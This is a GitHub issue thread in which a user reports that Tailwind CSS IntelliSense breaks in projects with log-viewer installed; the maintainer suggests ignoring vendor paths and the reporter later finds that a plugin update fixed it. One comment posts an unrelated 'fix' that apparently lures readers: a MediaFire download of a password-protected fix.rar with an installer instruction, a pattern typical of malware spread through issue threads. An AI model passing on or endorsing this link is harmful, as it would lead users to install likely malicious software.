### ISSUE TITLE
Tailwind CSS IntelliSense fails to initialize workspace

### ISSUE THREAD

**Issue by xTalAlex** [opcodesio/log-viewer#393]
This bug makes the Tailwind CSS IntelliSense features not working, such as tailwind classes suggestions or preview on hover.

I tested on different Windows machines using XAMPP and Laragon. The extension works in any project but in those i installed log-viewer in.
If i uninstall log-viewer the extension starts working again.

I haven't customized anything about log-viewer, i'm using it with a clean install.

**Versions**
log-viewer: 3.10 to 3.11
Tailwind CSS IntelliSense: 0.12.7

**Note**
I'm pretty sure it was working until latest tailwind plugin version. I've been using log-viewer for 3 months.

![2024-08-27 (1)](https://github.com/user-attachments/assets/79e34ae8-e994-4b59-9de6-a6b4b68efe57)

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by arukompas** [comment]
Hey @xTalAlex 

Not sure why it's looking inside vendor folder, but perhaps it's possible to ignore certain paths in the plugin?

**Comment by xTalAlex** [comment]
Thanks for the answer. 

Tailwind plugin got a new update (v0.12.8) just a couple of hours after i opened this issue and now the plugin is working again.
Apparently, it was some temporary bug by their side.

Anyway, in case anyone is facing the same problem, guess the solution is probably to add here the vendor folder causing error.
(you can check the log using ctrl + shift + p and look for command Tailwind CSS: Show Output)

![Screenshot 2024-08-28 131306](https://github.com/user-attachments/assets/1321ba69-9907-44fe-9d0f-cee22701abde)
